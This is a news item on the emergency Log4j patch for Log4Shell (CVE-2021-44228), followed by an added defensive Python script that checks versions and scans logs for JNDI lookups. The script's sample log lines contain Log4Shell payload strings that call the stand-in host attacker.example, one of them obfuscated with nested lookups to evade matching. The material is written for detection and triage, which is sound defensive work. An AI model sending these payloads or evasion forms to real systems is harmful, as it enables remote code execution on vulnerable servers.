Emergency patch for critical vulnerability in Log4j is released
The Apache Software Foundation has released an emergency security update to patch a remote code execution vulnerability (CVE-2021-44228) in the Java Log4j library, according to apache.org.
The vulnerability, now dubbed Log4Shell, can be exploited by forcing Java-based applications and servers that use the Log4j library to log a specially crafted string. When the application or server processes that log entry, the string can make the vulnerable system download and run a malicious script from an attacker-controlled domain, allowing the attacker to take control of the application or server.
Log4Shell is rated 10/10 on the CVSS v3 severity scale. CVE-2021-44228 affects Log4j versions from 2.0-beta-9 through 2.14.1. The issue does not exist in Log4j 1 and has been fixed in 2.15.0.
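The two facts above, the crafted-string mechanism and the affected version range, are what a defender needs for first-line triage. The Python script below is an added example written for this page, not code from Apache or securitylab.ru. It checks a reported Log4j version against the range the article gives and scans sample log lines for the JNDI lookup pattern that the crafted string relies on, collapsing the nested lookups that are commonly used to slip past naive string matching. The sample log lines, the `attacker.example` host and all function names are constructed for the example; the version bounds are the article's as stated, so later backport releases on the 2.12 and 2.3 branches are not modelled.

```python
"""Log4Shell (CVE-2021-44228) triage helpers: version-range check and a
JNDI-lookup scanner for log lines.  Added example for this article; not
code from Apache or securitylab.ru."""
import re
from typing import Callable, List, Tuple

# Affected range exactly as the article states it (2.0-beta-9 .. 2.14.1).
# Later backport fixes (2.12.2, 2.3.1) are deliberately not modelled here.
AFFECTED_LOW = "2.0-beta-9"
AFFECTED_HIGH = "2.14.1"
FIXED_IN = "2.15.0"

_PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}
_VERSION_RE = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)-?(\d+))?$", re.IGNORECASE)


def parse_version(text: str) -> Tuple[int, int, int, int, int]:
    """Turn '2.0-beta-9', '2.0-rc1' or '2.14.1' into a sortable tuple.
    A final release ranks above any pre-release of the same number."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor = int(m.group(1)), int(m.group(2))
    patch = int(m.group(3) or 0)
    if m.group(4):
        pre_rank, pre_num = _PRE_RANK[m.group(4).lower()], int(m.group(5))
    else:
        pre_rank, pre_num = 3, 0  # 3 = final release
    return (major, minor, patch, pre_rank, pre_num)


def is_affected_version(version: str) -> bool:
    """True when the version lies inside the article's affected range.
    Log4j 1.x sorts below the range, matching the article's statement."""
    v = parse_version(version)
    return parse_version(AFFECTED_LOW) <= v <= parse_version(AFFECTED_HIGH)


# Log4j lookup syntax is ${name:argument}.  The exploit string is a JNDI
# lookup; wrapping its letters in other lookups such as ${lower:j} or the
# ${...:-default} form hides the literal "jndi" from a plain substring
# match, so we collapse those forms first and then look for the prefix.
_NESTED_LOOKUP_RE = re.compile(
    r"\$\{(?:(?:lower|upper):([^${}]*)|[^${}]*:-([^${}]*))\}", re.IGNORECASE)
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise_lookups(text: str) -> str:
    """Repeatedly replace ${lower:x}, ${upper:x} and ${...:-x} with x, so that
    '${${lower:j}ndi:...}' becomes '${jndi:...}'."""
    def collapse(m: "re.Match") -> str:
        return m.group(1) if m.group(1) is not None else m.group(2)

    prev = None
    while prev != text:
        prev = text
        text = _NESTED_LOOKUP_RE.sub(collapse, text)
    return text


def find_jndi_lookups(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, normalised_line) for every line that carries a
    JNDI lookup once nested lookups have been collapsed."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        norm = normalise_lookups(line)
        if _JNDI_RE.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample access-log lines (hosts and user agents are made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:01:11 +0000] "GET /${user} HTTP/1.1" 404 "curl/7.68.0"',
]

if __name__ == "__main__":
    for ver in ("1.2.17", "2.0-beta-9", "2.14.1", FIXED_IN):
        state = "AFFECTED" if is_affected_version(ver) else "not affected"
        print(f"log4j {ver}: {state}")
    for n, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup after normalisation -> {line}")
```

The scanner reports the line after normalisation so an analyst sees what the lookup would have resolved to, not only the obfuscated raw text; the version check is meant for inventory output (for example the version embedded in a jar name) and raises on strings it cannot parse rather than silently treating them as safe.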
Source: securitylab.ru
14 December 2021